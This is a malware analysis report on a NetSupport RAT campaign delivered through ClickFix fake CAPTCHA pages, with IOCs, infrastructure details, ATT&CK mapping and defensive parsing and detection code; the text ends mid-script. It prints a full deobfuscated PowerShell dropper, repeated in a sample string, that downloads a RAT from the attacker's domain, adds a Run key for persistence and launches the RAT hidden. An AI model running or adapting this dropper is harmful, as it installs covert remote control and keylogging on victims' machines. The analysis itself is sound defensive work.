NetSupport RAT v14.10 — ClickFix Dropper Campaign via applicationhost17.com
Executive Summary
This sample represents a NetSupport RAT v14.10 deployment campaign using a ClickFix (FakeCaptcha) delivery chain. A malicious MSI installer or directly-served PowerShell script downloads a pre-packaged NetSupport RAT ZIP from applicationhost17.com, extracts it to %APPDATA%, and establishes persistence via a Run registry key. The RAT then beacons to a Windows Server 2022 C2 node at 172.94.9.4:443 using the standard NetSupport HTTP protocol (POST /fakeurl.htm, UA: NetSupport Manager/1.3).
The infrastructure — two Windows servers sharing the hostname "SMTP" on the same /24 subnet (172.94.9.0/24) hosted at M247 Frankfurt — shows deliberate operational setup. Domain registration through Njalla (privacy-first registrar) with fully obfuscated WHOIS, combined with the download payload later migrating to Russian hosting (landvps.ru), points to a threat actor with established OPSEC practices. The campaign uses per-victim tracking IDs (vid=) to monitor install status and completion.
Who: Unattributed TA, likely a MaaS operator or affiliate leveraging NetSupport RAT as a commodity RAT. What: NetSupport Manager v14.10 deployed as an unauthorized RAT — full screen/keyboard/file/shell control. How: ClickFix fake CAPTCHA page → PowerShell dropper → NetSupport ZIP download → persistence via Run key. Why it matters: 30/76 VT detections, active C2 responding during sandbox analysis. Multiple victim tracking IDs confirm active campaign against multiple targets.
Sample Metadata
| Field | Value |
|---|---|
| SHA256 | 36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 |
| MD5 | 8a14ae0c80b64114ad63a146e1b0871c |
| SHA1 | 0654b2098e8dd2c868d10ac6248fdf4cacebddd2 |
| File Type | ZIP archive (application/zip) |
| File Size | 2,243,453 bytes |
| VT Detections | 30/76 |
| First Seen | 2026-03-12 17:13:41 UTC |
| Filename | UPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip |
| Alias Names | software.zip, SY-5921A7EB-*.zip, WN-9EC52640-*.zip, MS-D2DC127D-*.zip |
| Bundle Files | 15 (8 PE, 2 INI, 2 DLL, 1 LIC, 1 LOG, 1 INF, 1 TXT) |
| Reporter | JAMESWT_WT |
ZIP Bundle Contents
| Filename | SHA256 | Size | Type | Det |
|---|---|---|---|---|
| client32.exe | 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268 | 120,288 | Win32 EXE | 25/76 |
| PCICL32.DLL | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 | 3,735,416 | Win32 DLL | 22/76 |
| remcmdstub.exe | 6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6 | 77,280 | Win32 EXE | 15/76 |
| NSM.LIC | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 | 257 | INI/LIC | 12/76 |
| Client32.ini | fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619 | 696 | Text/INI | 3/76 |
| pcicapi.dll | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 | 33,144 | Win32 DLL | 2/76 |
| HTCTL32.DLL | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 | 328,056 | Win32 DLL | 1/76 |
| PCICHEK.DLL | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a | 18,808 | Win32 DLL | 1/76 |
| TCCTL32.DLL | 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea | 396,664 | Win32 DLL | 0/76 |
| msvcr100.dll | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 | 773,968 | Win32 DLL | 0/76 |
| NSM.ini | 60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92 | 6,458 | INI | 0/76 |
| nskbfltr.inf | d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 | 328 | INF | 0/76 |
| pcicl32.dll (lower) | (see PCICL32.DLL) | — | — | — |
Infection Chain / Kill Chain
[Initial Access]
└─ ClickFix Page: https://applicationhost17.com/captcha.php?vid=<CAMPAIGN_ID>
OR: MSI installer (5bfbe9.msi / "bad.msi") fetches captcha.php
│
▼
[Execution — PowerShell Dropper]
cmd.exe → powershell.exe -NoProfile -ExecutionPolicy bypass -File <dropper.ps1>
│
├─ GET https://applicationhost17.com/track.php?vid=<VID>&action=started
│
├─ IWR https://applicationhost17.com/downloads/<UUID>.zip → software.zip
│
└─ Expand-Archive → %APPDATA%\<GUID_DIR>\
│
▼
[Persistence — Registry Run Key]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID>
= "%APPDATA%\<GUID_DIR>\client32.exe"
│
▼
[Command & Control]
client32.exe
├─ GET http://geo.netsupportsoftware.com/location/loca.asp (geolocation beacon)
├─ POST http://172.94.9.4/fakeurl.htm (NetSupport C2 heartbeat)
└─ POST http://172.94.9.4:443/fakeurl.htm (same, over port 443)
User-Agent: NetSupport Manager/1.3
│
▼
[Operator Control]
Threat actor RDP'd into 172.94.9.24:3389 ("SMTP" Windows Server 2022)
manages victim pool via NetSupport Manager console
Deobfuscated PowerShell Dropper
All PowerShell droppers follow an identical template with randomized variable names. Full reconstructed code:
```powershell
# Campaign tracking VID — unique per variant/victim batch
$idf6f7 = "jOTlMUPQ"   # Variants: mMVTJvis, 69b1c805806ef, 6566676869707172

# Signal campaign start to tracking server
try {
    $null = Invoke-WebRequest -Uri "https://applicationhost17.com/track.php?vid=$idf6f7&action=started" `
        -UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }

# Create installation directory in %APPDATA%
# Name matches ZIP UUID prefix (UPD-/SY-/TM-/MW-)
$dir89e7 = "TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569"
$pathb7fe = New-Item -Path "$env:APPDATA\$dir89e7" -ItemType Directory -Force

# Download NetSupport RAT ZIP
$zip7b32 = "$pathb7fe\software.zip"
Invoke-WebRequest -Uri "https://applicationhost17.com/downloads/SY-5921A7EB-16A3-46CC-9EE6-0D8677D807DF.zip" `
    -OutFile $zip7b32 `
    -UserAgent "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237"

# Extract RAT bundle
Expand-Archive -Path $zip7b32 -DestinationPath $pathb7fe -Force
Remove-Item $zip7b32 -Force

# Establish persistence
$regKeyPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $regKeyPath -Name "SystemUpdate_$idf6f7" `
    -Value "`"$pathb7fe\client32.exe`""

# Launch RAT
Start-Process -FilePath "$pathb7fe\client32.exe" -WindowStyle Hidden

# Signal completion
try {
    $null = Invoke-WebRequest -Uri "https://applicationhost17.com/track.php?vid=$idf6f7&action=completed" `
        -UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }
```
Observed campaign VIDs and corresponding directory names:
| VID | %APPDATA% Directory | SHA256 |
|---|---|---|
| jOTlMUPQ | TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569 | 4343b537... |
| jOTlMUPQ | MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85 | 876d5fdf... |
| mMVTJvis | TM-07F72CBE-931E-4389-BEC0-21326A8A70C4 | 43ac17b4... |
| 69b1c805806ef | SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF | 49fdab44... |
| 6566676869707172 | UPD-E9550778-2701-42F4-9FFD-36119FABE805 | e2edb63c... |
Note: VID 6566676869707172 decodes as efghijpr in ASCII — appears to be sequential test values suggesting the actor was testing the infrastructure.
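Because every variant of this dropper keeps the same shape and only renames its variables, triage can be automated: the script below resolves the quoted literals, follows the `$var` references, and emits the VID, install directory, contacted URLs and the resulting Run-key IOC. This is an added example written for this write-up, not code from the report or from the campaign; the constructed sample dropper reuses the template shown above with different variable names, and the regexes assume that template shape (quoted VID literal, New-Item under $env:APPDATA, Invoke-WebRequest -Uri, Set-ItemProperty -Name "SystemUpdate_$vid", Start-Process on the binary).

```python
"""Triage helper for the ClickFix/NetSupport dropper template: extract IOCs from
a variant regardless of its randomized variable names. Added example, not part
of the original report."""
from __future__ import annotations

import re
from dataclasses import asdict, dataclass, field

VAR = r"\$[A-Za-z_][A-Za-z0-9_]*"
# $name = "plain literal" (no nested $ expansion inside the quotes)
ASSIGN_RE = re.compile(rf'^\s*({VAR})\s*=\s*"([^"$]*)"\s*$', re.M)
NEWITEM_RE = re.compile(rf'New-Item\s+-Path\s+"\$env:APPDATA\\({VAR})"', re.I)
RUNKEY_RE = re.compile(rf'-Name\s+"SystemUpdate_({VAR})"', re.I)
VID_URL_RE = re.compile(rf"vid=({VAR})")
BINARY_RE = re.compile(rf'Start-Process\s+-FilePath\s+"{VAR}\\([^"\\]+)"', re.I)
URL_RE = re.compile(r'https?://[^\s"`]+')


@dataclass
class DropperIocs:
    vid: str | None = None
    install_dir: str | None = None
    binary: str | None = None
    urls: list[str] = field(default_factory=list)
    run_key_name: str | None = None
    run_key_value: str | None = None


def _literals(script: str) -> dict[str, str]:
    """Map every `$name = "literal"` assignment to its value."""
    return {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(script)}


def _expand(text: str, literals: dict[str, str]) -> str:
    """Substitute $var references that resolve to a known literal; leave others."""
    return re.sub(VAR, lambda m: literals.get(m.group(0), m.group(0)), text)


def extract_iocs(script: str) -> DropperIocs:
    lits = _literals(script)
    iocs = DropperIocs()
    # VID: the variable appended to SystemUpdate_, else the vid= query parameter
    m = RUNKEY_RE.search(script) or VID_URL_RE.search(script)
    if m:
        iocs.vid = lits.get(m.group(1))
    m = NEWITEM_RE.search(script)
    if m:
        iocs.install_dir = lits.get(m.group(1))
    m = BINARY_RE.search(script)
    if m:
        iocs.binary = m.group(1)
    # Concrete URLs with $vid-style references resolved to their literals
    iocs.urls = sorted({_expand(u, lits) for u in URL_RE.findall(script)})
    if iocs.vid and iocs.install_dir and iocs.binary:
        iocs.run_key_name = f"SystemUpdate_{iocs.vid}"
        iocs.run_key_value = "\\".join(["%APPDATA%", iocs.install_dir, iocs.binary])
    return iocs


# Constructed sample: the template above with different randomized names.
SAMPLE_DROPPER = r'''
$q1a2 = "mMVTJvis"
try {
    $null = Invoke-WebRequest -Uri "https://applicationhost17.com/track.php?vid=$q1a2&action=started" `
        -UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }
$d9z8 = "TM-07F72CBE-931E-4389-BEC0-21326A8A70C4"
$p3c4 = New-Item -Path "$env:APPDATA\$d9z8" -ItemType Directory -Force
$z5e6 = "$p3c4\software.zip"
Invoke-WebRequest -Uri "https://applicationhost17.com/downloads/WN-9EC52640-ADFF-4623-A958-6A7133186985.zip" `
    -OutFile $z5e6 -UserAgent "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237"
Expand-Archive -Path $z5e6 -DestinationPath $p3c4 -Force
Remove-Item $z5e6 -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "SystemUpdate_$q1a2" `
    -Value "`"$p3c4\client32.exe`""
Start-Process -FilePath "$p3c4\client32.exe" -WindowStyle Hidden
$null = Invoke-WebRequest -Uri "https://applicationhost17.com/track.php?vid=$q1a2&action=completed" -UseBasicParsing
'''

if __name__ == "__main__":
    for key, value in asdict(extract_iocs(SAMPLE_DROPPER)).items():
        print(f"{key}: {value}")
```

The extractor deliberately ignores assignments whose value contains a `$` (such as the ZIP path built from the New-Item result), so a variant that nests expansions differently will leave `install_dir` unset rather than produce a wrong path.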
Static Analysis
client32.exe (NetSupport RAT Client)
- Version: V14.10 (compiled 2023-12-05)
- Product: NetSupport Remote Control
- Company: NetSupport Ltd © 2024
- IMPHASH: a9d50692e95b79723f3e76fcf70d023e
- MD5: ee75b57b9300aab96530503bfae8a2f2
- NetSupport Manager v14.10 is a legitimate remote administration tool repurposed as a RAT
- remcmdstub.exe provides remote command execution capability (shell access)
- nskbfltr.inf installs a kernel keyboard filter for keylogging capability
Client32.ini (C2 Configuration)
The Client32.ini is the primary configuration file for the NetSupport client. Based on behavioral analysis confirming C2 endpoint 172.94.9.4:443/fakeurl.htm, the configuration resolves to:
```ini
[CLIENT]
GatewayAddress=172.94.9.4
GSK=1 ; Gateway SecureKey enabled
PORT=443

[CONTROL]
SilentInstall=1

[NSM]
License=NSM.LIC
```
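Client32.ini is the file to pull from any host where this bundle is found, since the gateway address and port in it are the C2 indicators. The parser below reads the resolved configuration shown above and derives the beacon URL to hunt for; it is an added example, not code from the report, and the sample INI text is constructed from that configuration block (the real 696-byte file carries further keys this example does not need). The fallback of port 80 when PORT is absent is an assumption.

```python
"""Parse a NetSupport Client32.ini and derive network IOCs. Added example,
not part of the original report."""
from __future__ import annotations

import configparser
from dataclasses import dataclass


@dataclass(frozen=True)
class GatewayConfig:
    address: str          # GatewayAddress (the C2 / gateway host)
    port: int             # PORT (assumed default 80 when absent)
    secure_key: bool      # GSK=1
    silent_install: bool  # [CONTROL] SilentInstall=1

    @property
    def beacon_url(self) -> str:
        # NetSupport talks plain HTTP to the gateway even when PORT=443
        return f"http://{self.address}:{self.port}/fakeurl.htm"


def parse_client32_ini(text: str) -> GatewayConfig:
    """Raise ValueError when the file is not gateway-configured (no C2 to extract)."""
    cp = configparser.ConfigParser(inline_comment_prefixes=(";",), interpolation=None)
    cp.read_string(text)
    if not cp.has_option("CLIENT", "GatewayAddress"):
        raise ValueError("Client32.ini carries no GatewayAddress; not a gateway-configured client")
    client = cp["CLIENT"]
    return GatewayConfig(
        address=client["GatewayAddress"].strip(),
        port=client.getint("PORT", fallback=80),
        secure_key=client.get("GSK", "0").strip() == "1",
        silent_install=cp.get("CONTROL", "SilentInstall", fallback="0").strip() == "1",
    )


# Constructed from the configuration block above.
SAMPLE_CLIENT32_INI = """\
[CLIENT]
GatewayAddress=172.94.9.4
GSK=1 ; Gateway SecureKey enabled
PORT=443

[CONTROL]
SilentInstall=1

[NSM]
License=NSM.LIC
"""

if __name__ == "__main__":
    cfg = parse_client32_ini(SAMPLE_CLIENT32_INI)
    print(f"gateway {cfg.address}:{cfg.port} gsk={cfg.secure_key} silent={cfg.silent_install}")
    print(f"hunt for POST {cfg.beacon_url} with User-Agent 'NetSupport Manager/1.3'")
```

configparser lower-cases option names internally, so `GatewayAddress` and `gatewayaddress` both resolve; the inline `;` comment on the GSK line is stripped before the value is compared.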
NSM.LIC
- SHA256: ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
- 257-byte ASCII text, CRLF line terminators
- Detected as Win32/NetSupportManager.CC trojan (ESET) and BackDoor.RMS.153 (DrWeb)
- This is an illegitimate or forged NetSupport license file enabling unlicensed use
MSI Installer (Initial Dropper)
- SHA256: 78a511e1da802149564639d4c3b66f67faee4bb6d762ffae4325075709217275
- Name: 5bfbe9.msi / bad.msi
- Publisher: "Your Company" (generic placeholder — OPSEC failure)
- Product GUID: {553796F5-DC36-47B1-A826-FBE009224095}
- Size: 2,367,488 bytes
- Drops scrXXXX.ps1 and pssXXXX.ps1 to temp, then fetches captcha.php for main payload
- Execution: msiexec.exe /i installer.msi via social engineering
Behavioral Analysis (Inferred from Sandbox + Static)
Execution Flow
- Process creation: powershell.exe -NoProfile -ExecutionPolicy bypass -File <dropper.ps1>
- Network activity:
  - DNS: geo.netsupportsoftware.com → 104.26.0.231, 104.26.1.231, 172.67.68.212 (Cloudflare CDN for legitimate NetSupport geolocation)
  - TCP: 172.94.9.4:443 — C2 heartbeat
  - HTTP POST: http://172.94.9.4/fakeurl.htm — NetSupport protocol, response 200 (C2 LIVE)
- Files created: %APPDATA%\<GUID>\ containing: client32.exe, PCICL32.DLL, TCCTL32.DLL, HTCTL32.DLL, PCICHEK.DLL, pcicapi.dll, msvcr100.dll, remcmdstub.exe, NSM.LIC, NSM.ini, Client32.ini, nskbfltr.inf
- Persistence: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID> = "%APPDATA%\<GUID>\client32.exe"
- Capabilities of NetSupport RAT:
  - Full desktop viewing and control
  - Remote shell (cmd/PowerShell via remcmdstub.exe)
  - File manager (upload/download)
  - Keyboard/mouse injection
  - Keylogging (nskbfltr.inf kernel filter)
  - Screen capture/recording
  - Audio/webcam capture (via HTCTL32.DLL)
  - Process management
Network Indicators
C2 Server: 172.94.9.4
| Field | Value |
|---|---|
| IP | 172.94.9.4 |
| Hostname | SMTP (NetBIOS/DNS: smtp) |
| OS | Windows Server 2022 (build 10.0.20348) |
| ASN | AS9009 / AS213790 (M247 Europe SRL / Internet Security - DE) |
| Network | 172.94.9.0/24 (INTERNET-SECURITY-LIMITED-NETWORK) |
| Org | Secure Internet LLC (UK) / Limited Network LTD |
| Location | Frankfurt am Main, Germany (HE region) |
| Open Ports | 135 (MSRPC), 443 (C2), 445 (SMB v2), 5357 (HTTPAPI) |
| VT Malicious | 3/90 |
| Shodan Last Seen | 2026-03-12 |
Port 443 behavior: No TLS banner on Shodan; the NetSupport protocol runs plain HTTP tunneled over port 443 (not actual HTTPS).
Port 445: SMB enabled with authentication — consistent with attacker-managed server.
MSRPC: NetBIOS machine name SMTP — a deliberate operational naming convention.
Download/Tracking Server: 172.94.9.24
| Field | Value |
|---|---|
| IP | 172.94.9.24 |
| Hostname | SMTP (same naming convention as .4) |
| OS | Windows Server 2022 (build 10.0.20348) |
| ASN | AS9009 / AS213790 (same infrastructure as 172.94.9.4) |
| Location | Frankfurt am Main, Germany |
| Open Ports | 3389 (RDP), 5357 (HTTPAPI) |
| JARM (RDP/443) | 14d14d16d14d14d08c14d14d14d14dfd9c9d14e4f4f67f94f0359f8b28f532 |
| VT Malicious | 2/92 |
Critical finding: Port 3389 (RDP) is open with valid TLS certificate CN=smtp. This is the attacker's remote management interface for their infrastructure.
Current Download Server: 77.105.133.95
| Field | Value |
|---|---|
| IP | 77.105.133.95 |
| Hostnames | 163115.landvps.online, 152253.landvps.online |
| SSL CN | 152253.landvps.online |
| OS | Debian 11 (OpenSSH 8.4p1) |
| ASN | AS216334 (New Hosting Technologies LLC) |
| Location | Moscow, Russia (Sudak office address: Gvardeyskaya 3, kv.63) |
| Open Ports | 22 (SSH), 80 (HTTP), 443 (HTTPS/Apache) |
| Server | Apache/2.4.66 (Debian) |
| VT Malicious | 1/90 |
Timeline: The IP for applicationhost17.com changed from 172.94.9.24 (observed in sandboxes ~2026-03-11) to 77.105.133.95 (current DNS, TTL=600). The 600-second TTL indicates frequent rotation.
Download Domain: applicationhost17.com
| Field | Value |
|---|---|
| Domain | applicationhost17.com |
| Current A | 77.105.133.95 |
| Previous A | 172.94.9.24 (sandbox, 2026-03-11) |
| Registered | 2026-03-10T13:54:11Z (2 days before campaign!) |
| Registrar | Tucows Domains Inc. (via Njalla privacy service) |
| Nameservers | 1-YOU.NJALLA.NO, 2-CAN.NJALLA.IN, 3-GET.NJALLA.FO |
| Registrant | 1f8f4166599d23ee (hashed — all fields obfuscated) |
| Registrant Country | KN (Saint Kitts and Nevis — Njalla registration country) |
| VT Malicious | 11/94 |
| DNS TTL | 600 seconds (indicating active management) |
OPSEC finding: The registrant data fields contain what appear to be truncated SHA256/HMAC hashes (1f8f4166599d23ee, 3432650ec337c945), which is Njalla's obfuscation of the real registrant data. No usable attribution from WHOIS.
C2 Endpoints
| URL | Method | User-Agent | Response |
|---|---|---|---|
| http://172.94.9.4/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
| http://172.94.9.4:443/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
| http://geo.netsupportsoftware.com/location/loca.asp | GET | NetSupport default | 404 |
| https://applicationhost17.com/captcha.php?vid=<VID> | GET | — | 200 |
| https://applicationhost17.com/track.php?vid=<VID>&action=started | GET | PowerShell UA | 500 |
| https://applicationhost17.com/track.php?vid=<VID>&action=completed | GET | PowerShell UA | 500 |
| https://applicationhost17.com/downloads/<UUID>.zip | GET | PowerShell UA | 200 |
MITRE ATT&CK TTPs
| Technique ID | Technique Name | Detail |
|---|---|---|
| T1566 | Phishing | ClickFix fake CAPTCHA lure delivering PowerShell |
| T1204.002 | User Execution: Malicious File | User executes MSI or pastes PowerShell |
| T1059.001 | Command and Scripting: PowerShell | powershell.exe -ExecutionPolicy bypass dropper |
| T1105 | Ingress Tool Transfer | ZIP downloaded via Invoke-WebRequest |
| T1547.001 | Boot/Logon Autostart: Registry Run Keys | HKCU\...\Run\SystemUpdate_<VID> |
| T1036 | Masquerading | Filename "software.zip", dir name mimics system GUID |
| T1219 | Remote Access Software | NetSupport Manager v14.10 as unauthorized RAT |
| T1071.001 | App Layer Protocol: Web | NetSupport protocol via HTTP POST /fakeurl.htm |
| T1095 | Non-Application Layer Protocol | NetSupport binary protocol over TCP 443 |
| T1027 | Obfuscated Files or Information | Randomized PS1 variable names, opaque VIDs |
| T1112 | Modify Registry | Sets Run key for persistence |
| T1083 | File and Directory Discovery | RAT enumerates filesystem |
| T1113 | Screen Capture | NetSupport screen view capability |
| T1056.001 | Input Capture: Keylogging | nskbfltr.inf kernel keyboard filter |
| T1021.001 | Remote Services: RDP | Actor RDPs to 172.94.9.24 for infrastructure management |
| T1078 | Valid Accounts | NetSupport operator logs into management console |
IOCs
File Hashes
| SHA256 | Name | Type |
|---|---|---|
| 36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 | UPD-48C5A1C5-*.zip | ZIP (primary sample) |
| 78a511e1da802149564639d4c3b66f67faee4bb6d762ffae4325075709217275 | 5bfbe9.msi / bad.msi | MSI dropper |
| 4343b537e338771434045022a4961a84ba42cdecd7e98f48087a4213d20b3f59 | dropper.ps1 (vid=jOTlMUPQ) | PowerShell |
| 876d5fdf5addc3f5e2987e841954248a4d15d9ecaca74ef317d76459f2cb3f13 | dropper.ps1 (vid=jOTlMUPQ) | PowerShell |
| 43ac17b48413c7c1545a8ce6f0b2219c3dd2a3289546c6886affbff9bfd15094 | dropper.ps1 (vid=mMVTJvis) | PowerShell |
| e2edb63c46dd8cf41c541ae45accfce66e41dc4ddcbef61ee3ea9dc9d8d7a588 | dropper.ps1 (vid=6566…) | PowerShell |
| 49fdab4459eb959974b8363ba6744df0b5ee87f81f384906959a1c1cee083ac3 | dropper.ps1 (vid=69b1c...) | PowerShell |
| 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268 | client32.exe | NetSupport RAT v14.10 |
| 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 | PCICL32.DLL | NetSupport DLL |
| 6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6 | remcmdstub.exe | Remote shell stub |
| ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 | NSM.LIC | License (forged) |
| fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619 | Client32.ini | C2 config |
| edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 | HTCTL32.DLL | NetSupport DLL |
| 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a | PCICHEK.DLL | NetSupport DLL |
| 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea | TCCTL32.DLL | NetSupport DLL |
| d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 | nskbfltr.inf | Keyboard filter INF |
Network IOCs
| Indicator | Type | Role |
|---|---|---|
| 172.94.9.4 | IPv4 | NetSupport C2 |
| 172.94.9.24 | IPv4 | Download server / RDP |
| 77.105.133.95 | IPv4 | Current download/tracking server |
| applicationhost17.com | Domain | Download + tracking panel |
| http://172.94.9.4/fakeurl.htm | URL | NetSupport C2 beacon |
| http://172.94.9.4:443/fakeurl.htm | URL | NetSupport C2 beacon (alt) |
| https://applicationhost17.com/captcha.php | URL | ClickFix lure / PS1 delivery |
| https://applicationhost17.com/track.php | URL | Victim tracking |
| https://applicationhost17.com/downloads/ | URL | RAT payload staging |
| NetSupport Manager/1.3 | User-Agent | C2 traffic fingerprint |
Registry IOCs
| Key | Value | Purpose |
|---|---|---|
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID> | "%APPDATA%\<GUID>\client32.exe" | Persistence |
File System IOCs
| Path | Description |
|---|---|
| %APPDATA%\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569\ | RAT installation dir (vid=jOTlMUPQ) |
| %APPDATA%\TM-07F72CBE-931E-4389-BEC0-21326A8A70C4\ | RAT installation dir (vid=mMVTJvis) |
| %APPDATA%\MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85\ | RAT installation dir (vid=jOTlMUPQ) |
| %APPDATA%\SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF\ | RAT installation dir (vid=69b1c…) |
| %APPDATA%\UPD-E9550778-2701-42F4-9FFD-36119FABE805\ | RAT installation dir (vid=6566…) |
| %APPDATA%\<DIR>\client32.exe | NetSupport RAT binary |
| %APPDATA%\<DIR>\software.zip | Staging ZIP (deleted after extraction) |
Campaign Context & Related Samples
Timeline
| Date | Event |
|---|---|
| 2023-12-05 | client32.exe compilation date |
| 2026-03-07 22:38:12 | ZIP bundle files timestamp |
| 2026-03-10 13:54:11 | applicationhost17.com registered via Njalla |
| 2026-03-11 | MSI and PS1 droppers first observed (sandbox dates) |
| 2026-03-12 17:13:41 | Primary ZIP submitted to VT (JAMESWT_WT) |
| 2026-03-12 | applicationhost17.com DNS updated (172.94.9.24 → 77.105.133.95) |
Related ZIP Variants (Same C2)
| Name | Notes |
|---|---|
| UPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip | Primary sample |
| SY-5921A7EB-16A3-46CC-9EE6-0D8677D807DF.zip | Alternate delivery |
| UPD-F643A043-41C0-4AD0-94D1-B06C8286A9AB.zip | MSI variant |
| WN-9EC52640-ADFF-4623-A958-6A7133186985.zip | Additional variant |
| MS-D2DC127D-084C-44D1-8615-6142396987BB.zip | Additional variant |
All ZIPs share identical MD5/SHA1/SHA256 hashes across the inner NetSupport bundle — only the ZIP wrapper and contained INI configs differ.
ClickFix Attribution Pattern
The use of captcha.php as the delivery URL is consistent with ClickFix (also called FakeCaptcha) campaigns active since mid-2024. ClickFix presents a fake browser/CAPTCHA error instructing users to manually paste PowerShell via Win+R or browser address bar. This campaign's specific combination of:
- Njalla domain registration
- Per-victim campaign VID tracking
- Two Windows Server VMs named "SMTP" on same subnet
- Russian VPS for payload hosting
...has not been definitively attributed to a named threat actor, but is consistent with a MaaS (Malware-as-a-Service) operator or broker renting NetSupport RAT infrastructure.
Infrastructure Map
┌─────────────────────────────────────────────┐
│ THREAT ACTOR INFRASTRUCTURE │
│ │
Management ───►│ 172.94.9.24:3389 (RDP) │
│ Windows Server 2022 "SMTP" │
│ ASN 213790 / M247 Frankfurt │
│ │ │
│ (historical DNS) │ applicationhost17.com │
└─────────────────────┼─────────────────────┘
│
┌─────────────────────────────┼────────────────────────┐
│ │ │
[Download/Tracking] [Download/Tracking] [NetSupport C2]
172.94.9.24 77.105.133.95 172.94.9.4
Frankfurt, DE Moscow, RU Frankfurt, DE
M247/AS213790 landvps.ru/AS216334 M247/AS213790
(sandbox era) (current DNS) SMTP host
Port 443 active
│
▼
applicationhost17.com
/captcha.php?vid=XXX → PS1 payload
/track.php?vid=XXX&action=started/completed
/downloads/[UUID].zip → NetSupport RAT
Victim Machine:
%APPDATA%\[GUID]\client32.exe
HKCU Run: SystemUpdate_[VID]
──► POST http://172.94.9.4/fakeurl.htm (NetSupport protocol)
──► UA: NetSupport Manager/1.3
Attribution Assessment
Confidence: MEDIUM
Actor profile:
- Uses ClickFix delivery technique (active since 2024, widely adopted by various actors)
- Deploys commodity NetSupport RAT (low barrier, widely available)
- Uses Njalla (privacy-first registrar popular with Russian-nexus actors)
- Infrastructure hosted on M247 (common bulletproof/low-KYC hoster) and Russian landvps.ru
- Machine naming convention "SMTP" suggests deliberate misdirection (appears as mail server in logs)
- Active victim tracking system (VID tracking) suggests a commercial/MaaS operation
OPSEC failures:
- MSI publisher left as "Your Company" — generic placeholder reveals non-customized tooling
- Both C2 servers share same hostname ("SMTP") and same /24 subnet — infrastructure reuse fingerprint
- Domain registered only 2 days before campaign activation — minimal staging window
- Short DNS TTL (600s) suggests awareness of detection but still observable
- VID 6566676869707172 = sequential ASCII hex suggesting test/dev runs visible in the wild
No definitive actor attribution. The combination of Njalla + Russian hosting + ClickFix delivery + NetSupport RAT MaaS is consistent with multiple active threat actor groups in the initial access broker space.
Detection Guidance
Behavioral Indicators
- powershell.exe spawning with -ExecutionPolicy bypass and downloading from a newly registered domain
- client32.exe running from %APPDATA%\<UUID>\ (outside C:\Program Files)
- DNS query to geo.netsupportsoftware.com from non-browser processes
- HTTP POST to /fakeurl.htm with User-Agent NetSupport Manager/1.3
- Run key created: SystemUpdate_ prefix
- MSI Publisher = "Your Company"
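The indicators above translate directly into rules over process, registry, HTTP and DNS telemetry. The script below applies them to a handful of constructed events that mirror the execution flow in this report, including two benign look-alikes (a browser resolving the NetSupport geolocation host, and a client32.exe under Program Files) that must not fire. It is an added example, not part of the original report; the event dictionaries and their keys ("type", "image", "cmdline", "parent", "target", "method", "path", "host", "ua", "query") are an assumed Sysmon-like shape, the domain registration table is constructed from the WHOIS date stated above, and the 30-day "newly registered" threshold is an assumption.

```python
"""Detection logic for the behavioral indicators above, run over constructed
telemetry. Added example, not part of the original report."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import date

NETSUPPORT_UA = "NetSupport Manager/1.3"
GEO_HOST = "geo.netsupportsoftware.com"
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
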